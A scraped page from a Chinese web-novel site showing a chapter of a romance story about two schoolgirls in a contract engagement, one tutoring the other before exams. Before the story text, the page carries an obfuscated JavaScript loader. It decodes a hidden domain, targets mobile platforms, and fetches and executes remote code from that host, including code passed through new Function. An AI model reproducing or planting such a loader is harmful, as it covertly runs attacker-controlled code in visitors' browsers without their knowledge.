98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(15(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

宋若继续切她的西红柿,也没有否认,嗯了一声。

孟璟探手拿了一块刚切下来的新鲜西红柿,塞进嘴里,弯弯眼睛,切得不错。

芬姨在旁边看见,立刻说:哎哎,那是炒熟了才好吃的。

孟璟哼着小曲儿出去了,一边说:芬姨,今晚准备点儿夜宵。

晚饭后两个人用视频连线看过爷爷,得知一切安好,就回了房间学习。

今天的重点复习科目是数学和英语。孟璟不知道是不是自己的错觉,她总觉得今天便宜未婚妻哪里不太对劲。这个感觉直到芬姨送酒酿汤圆进来,依然非常强烈。她慢慢地舀汤喝,觑着眼斜斜看侧边的小姑娘,诶,依旧不朝自己这边看,没毛病啊。她歪了歪头,可能是自己想多了。等等,她好像没吃东西?因而问了一声:不喜欢吃吗。

宋若把她的那碗也放到孟璟跟前,这也给你。

孟璟摇摇头:我吃不了,一起吃才好吃。

然后宋若就站起来了,孟璟正奇怪呢,肩膀上忽然两边各有一只温柔的小手降落,轻轻揉捏着,力道拿捏得刚刚好,好比那次在游泳馆,给她按摩小腿时一样!

孟璟觉得受用之余,又有点忐忑,小药瓶子这是什么路数?等按了有两分钟了,见她依旧没有要停下来的意思,她不自然轻咳:你干嘛?

便宜未婚妻手上对她这样那样,声音却依旧清冷自持到不行:孟小姐,我有件事想拜托你。

孟璟回身过去,反手抓住她的手腕,凝视着她,嗤地一笑:才给我补了一天课,就有交换条件啦。

宋若脸上写满愧疚,在她的注视之下,言简意赅地把事情的来龙去脉讲了讲。

孟璟本来已经膨胀回来的自信心,又像被扎爆的皮球一样瘪了回去,松开了未婚妻的手,难以置信地问:为什么要说林尽染是我女人?你才是啊,你又装什么妹妹。

宋若说:是你的,他就不好再骚扰了。朋友妻不可欺。

孟璟觉得刚刚吃的夜宵简直太燥热了,扯了扯领口,扇着风,断然拒绝:不行。林尽染是我妹。你才是我老婆。这个不能乱。

宋若点头:总之,拜托你了。

孟璟刚跟过山车似的,说不上为什么心里很不得劲儿,唔。

宋若坐下来,拿过习题准备动笔的时候,孟璟按住了那张卷子,等等。

我也有条件。

宋若啊了一声:你说吧。

看着我。

慑于她那种笃定的口气,宋若不由自主转过脸来,清淡的目光落在一双亮如星辰的眼眸上。这是穿书以来距离最近的一次对视。她能听见胸腔里心脏怦怦跳动的声音,在这种静谧的空间里,嘈杂得过分了。房间好像突然变小了一点,可也没有怎么样。阴郁女主再可怕,也只不过不爱她,又不是真吃人的抹香鲸。她轻舒一口气。

孟璟勾唇一笑:这就对了。

宋若:什么条件。

我已经说了啊,以后都这样看着我,只看着我。

第21章 一百块

人常常有这样的体验,做心爱之事,时光飞逝,被逼服苦役,则度日如年。

孟璟不期然十六岁这年的夏季,被试卷包围的光阴,竟然觉得心里头甜丝丝的,转眼间就过了一星期。她都怀疑,这么些年,自己是个被游戏耽误了的学习狂魔。到了期末考试的这天早上,她打着哈欠,揉着眼睛从二楼下来,看见早饭桌上那个纤细的背影,忽然就来了精气神,三步两步下楼,在对面坐下,故作闲适望着宋若,哟了一声:早啊。

宋若正喝粥,眼皮没抬一下,早。

孟璟心里痒痒,想多说几句,可又不知说什么好,只得小口喝自己的鲜榨果汁,不时朝对面未婚妻脸上睃一眼,眼看她早饭吃完了,也加快速度,忙忙喝完。等她漱个口出来,果不其然,便宜未婚妻人就到了玄关处,等她拿上书包,抬头就只来得及捕捉门缝里荡过的一抹白。换了鞋火速追出去,推着车赶到未婚妻的身旁,清清嗓子:老婆,怎么不等我呀,一起走嘛。

宋若本来往前快步走,听得这个称呼,忽然顿住了脚。

孟璟见她站住,也停下了,眨巴了两下眼睛。在开得如火如荼的两片玫瑰花圃中间,有鸟鸣啾啾,也有山地车车轮轧在地面的轻微喀啦声。

晨曦中的小小未婚妻自带柔光特效,鼻梁高高的,眼睛水汪汪的,嘴唇孟璟怕自己再起邪念,稍感不自在地挪开视线,没看。宋若忽然朝自己这边伸出右手,掌心摊开向上。

干嘛?孟璟抬了抬右边的眉毛,垂眸看一眼那肤色晶莹的小爪子。

宋若微笑着,给钱。

哈?

以前那些就算了。宋若手撤回来,握着书包带子,语气是大写的秋后算账,从现在开始,你每叫一声老婆,就给我一百块。

孟璟语塞:

契约书上确实有事从权宜这一项。平时呢?比如刚刚,有这个必要?宋若依旧清清淡淡地望着她,语气凉凉的,每个字都化作一把小锥子,凿击着孟璟的神经,孟小姐,你最近很过分。

便宜未婚妻义正辞严地说完,就继续前进了。孟璟默在当地,看着她坚毅的小小背影,过了足足有半分钟才嗤地一声笑出来。

成啊,这小狐狸崽子,前几天都是在那儿装柔顺呢。

这让人放松了警惕,时机成熟了把脸一变,亮出了她的伶牙俐齿和锋锐的爪钩。这还颇有点郑伯克段于鄢的意思。等她洋洋得意把老婆叫顺了口,转个背要收钱了。杀了她一个措手不及。

孟璟也不骑车,也不去加以触犯,推着那小破车,在距离便宜未婚妻半米远的后方慢速前行,期间不少次歪着头打量那小矮子,想看透她是什么做的。

考场是前一天布置好的。同个班的学生分散到天南海北。孟璟直接到了初中部的五十二考场。宋若和林尽染的运气比较好,还留在高中部,考室在隔壁。

考语文之前,林尽染特意跑来找宋若:怎么样,怎么样,答应了吗?

前段孟璟出面,帮忙摆平了纠缠不休的张彬,说辞是,她妹妹林尽染是个学痴,个人问题放到十年之后才予以考虑,十年内都会专注于学习,起码要读到博士才罢休,而且她喜欢的对象,也得是有共同理想的知识分子,她对打打杀杀没兴趣。孟璟说什么,张彬就信什么,现在在家苦恼,到底是壮士断腕,铤而走险去挑战自己不擅长的科学文化知识,还在待在舒适区,做自己的东城区头目。同时他也给孟璟保证了,不混出个人样儿来,不等到林尽染成年,绝不再出现在她面前。

他一个混江湖的,最讲究一言九鼎,从此果然销声匿迹。

林尽染感佩于此,想约孟璟和宋若暑假去家里吃个饭,以示感谢。奈何那天宋若把她说成孟璟的女人,搞得她很不好意思,最近在教室都不敢回头,怕与孟璟视线相撞,尴尬。而且大佬的脾气变幻莫测,她还真有一点点害怕。另一方面,宋若倒好像对孟璟的事情很了解似的,连她和社会青年有交情的事都知道,搞不好两个人私下里很亲近,就拜托她代为转达了,现在来问个准信儿。

宋若想起孟璟笑得邪乎:成啊,我和我老婆第一次俪影双双去别人家做客,好期待的说。

当时宋若十分讶异。一是阴郁女主怎么涎皮赖脸,不对劲成这副模样;二是她个二世祖,原著人设分明是不学无术,游手好闲,居然随口说出俪影双双这样的词,着实让人吃惊。她闭眼驱赶抹香鲸那个魔性的笑容,恰好响铃了,进考室前她拍了下林尽染的肩,她也去的,到时候要麻烦你和阿姨了。

不麻烦不麻烦。林尽染不胜欢喜,朝她比个大拇指,若若,考试加油。

宋若也说了声加油,两个人挥挥手,各自进了自己的考室。

作文不是宋若的强项。同样题目的议论文,擅长的人能写出花儿来,她只能论点论据论证,按部就班往下走。不过时间还算充分,做完检查一遍,还剩三十分钟。她坐的位子恰好在最后一排靠窗的位置,又正对着教室后门,因而有凉爽的穿堂风,她就没有提前交卷,坐在座位上揣摩《温柔待我》,琢磨程曦这个人物。

这天考完后,抹香鲸来高中部教学楼的楼下等她,吊儿郎当地嚼着口香糖,宋若刚下到一楼,就看见她吹了个老大的泡泡。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间